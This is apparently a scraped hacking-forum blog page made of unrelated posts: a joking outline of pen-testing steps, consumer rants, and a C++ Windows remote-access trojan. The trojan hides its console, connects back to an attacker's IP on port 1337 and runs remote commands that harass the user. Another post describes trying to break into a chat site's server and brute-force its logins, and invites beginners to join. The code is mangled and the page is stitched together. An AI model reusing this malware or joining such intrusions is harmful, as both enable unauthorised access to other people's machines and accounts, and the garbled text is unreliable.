steps of pen testing

There are four basic steps of Penetration Testing…….Well the fifth one is filing the report but you don’t need to know THAt!! SO, 5 steps of awesomeness. These steps area as follows:
1. Information Gathering : The more you know about the target, the more easily its going to be for you to influence him. The easier to influence will in turn make you avail to more information, and more influence and more information and on and on and on until you know everything about that target……..OH LOOK!! YOU HAVE A LIFE PARTNER NOW!!
2. Scanning : Information is gathered at first, now you gotta find out the information available for that moment. That is accomplished by scanning. it is used to know whether the host is up, which port is open and then finding vulnerability a structural weakness if you will. No system is invincible, there is a kryptonite for every superman. THAT’s what the purpose of scanning is, finding the superman system’s kruptonite.
3. Sniffing: Its more like a blood hound activity, finding the weakness and sniff out whatever you can from the cracks or in the system’s case passwords, usernames, secrets normally anything not everyone would want you to see. in kali sniffing techniques include wireshark, ettercap etc. Then the companies will ask you to fix this, and yo ass get paid.
4. Exploitation: Now the stage is a set, you know the info, the weaknesses, the passwords. Its now time to whoop them up for action. Expliotation deals with exploiting whatever the attacker has gathered in the last 3 steps and then explioting the system, or the organization. Its the final test that a Pen-Tester use to look down on companies and say”YOU ARE WEAK!!” and then the companies ask them for tips on how to fix it.
“Nothing in the world is impenetrable, Invincibility is an illusion used on the people so they can look the other way and get their ass handed to them”

Amp Blasts: Best Buy

Ya know, there are times where many people want to be able to get movies, music, games, and some PC hardware. The reality is though that for many people who don't like in major metropolitan areas in the US, the choices are limited with regards to brick and mortar. This would eventually result in the one place to go becoming none other than Best Buy. However, I feel that Best Buy is not only on the way out, but has done a considerable amount of damage with regards to consumer quality with the spectacularly terrible decisions they have made over the years.

First, most of the electronics sold are hardly quality. The two major cable suppliers are Dynex and RocketFish, both owned by Best Buy themselves and typically are very poor quality with an up-marked price tag when compared to similar cables online that reaches astronomical levels of what the fuck. Then there are the low quality PC products that they sell, which includes their 'high end' since most of the laptop models utilize one heatsink pipe for both the GPU and CPU. The biggest what the hell is the extra warranties that they attempt to sale which to me feels dirty since many times there can be loose verbiage to avoid payout once the standard warranty is at an end. Overall, don't bother getting electronics here.

Second, there is the matter of it's video selection, or rather the increasing lack thereof. Now, I am actually of the opinion that they made the right move to reduce the anime footprint cause quite frankly, anime does not make money in this day and age. However, the general selection has become nothing short of abysmal and there is an insistence of pushing the site to store option which barely has any better of a selection and will take a considerable amount of time to arrive. The end result is that for people wanting a good DVD/Blu-Ray selection, go on Amazon or other online vendors.

A word on Java 8

I heard about the buzz regarding the recent Java 8 release and it's usage of Lambda expressions and honestly, it's nothing to get very excited about. Yes, it makes code more readable, but the reality is that the majority of other languages including the C++11 standard beat them to the punch in doing this. The bigger concern is that rather than being proactive, Oracle's approach to security has been reactive which hurts the language badly. At this point, they need to rethink their strategies a bit as more and more, many people like myself are avoid Java based applications and development when possible.

Current OFACE status

I'd figure I'd pop in and chat a bit about OFACE at this point. One of the things that was stopping me from finalizing an alpha and over time became the Moby Dick to my Captain Ahab were my attempts to find a non-GUI equivalent to TDSSKiller. After discussing the matter with RaT however, I have made the difficult decision to move forward without this for the time being. I will be piecing everything together when availability permits as I am only able to work on this on an after hours basis at this point. Once an alpha is tested as working and released, I will discuss future plans for the further development of OFACE with RaT.


Based on What people foolish enough to use this site are thinking....

im mad so i bloged about it!

i got so mad on irc i decided i needed to seek help so i called thats right SUE BASKO!


#undef  _WIN32_WINNT //For hiding/showing window
#define _WIN32_WINNT 0x0500
#include <windows.h> //Required for socket init
#include <iostream>
#include <stdlib.h>
#include <windows.h>
#include <iomanip>
#include <stdio.h>
#include <conio.h>
#include <fstream>

using namespace std;

//function declaration prototypes
void crazyMouse(BOOL cmProc);
void Matrix(BOOL pwnProc);
char procCmd(char buff[200], SOCKET * fSocket);
void PoP(char message[200]);

// static variables (Dont know why i did this)
static BOOL pwnProc = false;
static BOOL pop = false;

//pointer to socket
SOCKET * pSock;
//for matrix
HWND hWnd = GetConsoleWindow();

int main(){
    // First thing we want to do is make sure that our console is in-fucking-visible
ShowWindow( hWnd, SW_HIDE );

//Begin winsock chunk
char buf[256];
WSAData wsdata;
WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and pointer to implement
if(nret != 0){ //Init failed
/*A successful return value should be 0 */
std::cout<<"Startup failed, error code: "<<WSAGetLastError(); //Returns error code
WSACleanup(); //Cleanup Winsock library
return -1;
std::cout<<"Init success\n";
if(kSock == INVALID_SOCKET){
std::cout<<"Socket init failed";
return -1;
std::cout<<"Socket initialized\n";
sockaddr_in sin;

//****PORT HERE****
sin.sin_port=htons(1337); //Connect to port 1337
//****PORT HERE****

////////////***************IP HERE////////////***************
sin.sin_addr.s_addr=inet_addr(""); //Connect to this ip (Should be your ip, so the victim connects to you )
////////////***************IP HERE////////////***************

if(connect(kSock,(sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR){ //Check the condition
std::cout<<"Connect failed, error: "<<WSAGetLastError(); //Returns error code
WSACleanup(); //Cleanup the library
return -1;
std::cout<<"Connection successful!\n";

//    ^^^^^^^^^^^^ The program will always come back here to re-receive and re-compare commands.
pSock = &kSock;
// |
// v
//Back down
while (recv(kSock, buf, sizeof(buf), 0)){  //while the command is received
procCmd(buf,pSock); //push the received command into the procCmd function to be compared with a command list

//Back up
goto REC;
return 0;

/////////////// BEGIN COMMAND LIST /////////////////

//the procCmd fucntion means ProcessCommand and is responsible for handling commands.
// If you are going to add new commands to this program you should start here.

char procCmd(char buff[200], SOCKET* fSocket){

     // needs to be reinit'd cuz of cross function
     SOCKET kSock = *fSocket;

/* This is where the magic happens, the received commands are compared to a hard coded list of commands. If it recognizes a command, it is sent to the appropriate function (or just executed if the code is small). I initially added in character return values so i could resend them back to the server (me) to verify if a command was executed or not. I  never got around to it , maybe you can?*/

     if (pop == true){   /*Pop is a special command because it displays a message box on the users screen. So the command pop would first need to written, which would make pop==true. Once it's true, it will be expecteing another sub-command for the actual contents of the messagebox, this is why the server-side code needed to deal with the pop command, so that it could prompt the user to input a sub command, i dont know why i did it this way.*/
                          pop = false;
                          return '1';
     if (strcmp(buff,"pop")==0){
                          pop = true;
                          return '1';
      if (strcmp(buff,"end")==0){
      if (strcmp(buff,"-")==0){
                          ShowWindow( hWnd, SW_HIDE );
                          return '1';
     if (strcmp(buff,"+")==0){
                          ShowWindow( hWnd, SW_SHOW );
                          return '1';
     if (strcmp(buff,"pwn")==0){
                          return '1';
      if (strcmp(buff,"unpwn")==0){
                          //clean up
                          ShowWindow( hWnd, SW_HIDE );
                          return '1';
      if (strcmp(buff,"crazymouse")==0){
                          return '1';
      if (strcmp(buff,"uncrazy")==0){ //not working
                          return '1';
                        return '0';

/////////////// BEGIN EXECUTABLE FUNCTIONS ////////////////////////////

// Pop up message - Grim
void PoP(char message[200]){

/* this thing is really cute, it puts the dialog box into full screen and displays a bunch of green random texts like the matrix. If you want to stop it manually just press alt+enter to get out of fullscreen then close it.*/

// Matrix , total annhilation - Grim
void Matrix(BOOL pwnProc){
if (pwnProc==true) {
       // make sure its visible
ShowWindow( hWnd, SW_SHOW );      
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
     for(int i = 0; i < 1; i++)
int num = (rand() % 10);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";

for ( int j = 0; j < 5; j++)
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
goto START;
     //Crazy mouse - Grim
void crazyMouse(BOOL cmProc){
                  int x = rand()%1000;
                  int y = rand()%700;
                  SetCursorPos(x, y);
                          while (cmProc==true);

my first trial on

i had a serious surgery. during recovery i found a small java based wap site called upon playin i found it to be full of childmolesters hiding behind pixel avitars though i dont have the authority heheheh i have found myself cleaning up the corrupted site . removing and exposing the pedofiles is fun but now old tactics do not work . i have a list of t argets but i am stuck i cant seem to penetrate the server or brute force logins anymore. yes this is small potatoes to some but it is quite entertaining watching the chatroom cry Smile feel free to join in the fun it is great practice for beginning level starters.

Flair's blog site

Any new hints for newbies in the site maybe posted here if by any chance I get them. So if you are a script kid or a newbie and have a problem, you can post them here.

Syndicate content